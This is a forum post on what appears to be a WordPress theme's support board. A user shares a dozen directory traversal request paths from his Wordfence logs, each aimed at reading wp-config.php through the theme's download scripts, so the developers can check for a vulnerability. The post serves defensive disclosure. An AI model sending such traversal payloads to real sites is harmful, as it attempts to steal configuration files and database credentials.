Security Directory traversal – maybe an issue

  • Marcel

    #51218

    I had the following in my logs of wordfence. I thought I will share, so you can verify your code to make sure it is not an issue.

    /themes/graphene/down.php?path=..%2F..%2F..%2Fwp-config.php
    /themes/graphene/download.php?file=..%2F..%2F..%2Fwp-config.php
    /themes/graphene/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php
    /themes/graphene/inc/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php
    /themes/graphene/includes/view-pdf.php?download=1&file=..%2F..%2F..%2F..%2Fwp-config.php
    /themes/graphene/lib/scripts/download.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php
    /themes/graphene/includes/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php
    /themes/graphene/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php
    /themes/graphene/functions/download.php?imgurl=..%2F..%2F..%2F..%2Fwp-config.php
    /themes/graphene/download.php?download=..%2F..%2F..%2Fwp-config.php
    /themes/graphene/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php
    /themes/graphene/framework/utilities/download/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php

Viewing 1 post (of 1 total)

  • You must be logged in to reply to this topic.
Do NOT follow this link or you will be banned from the site!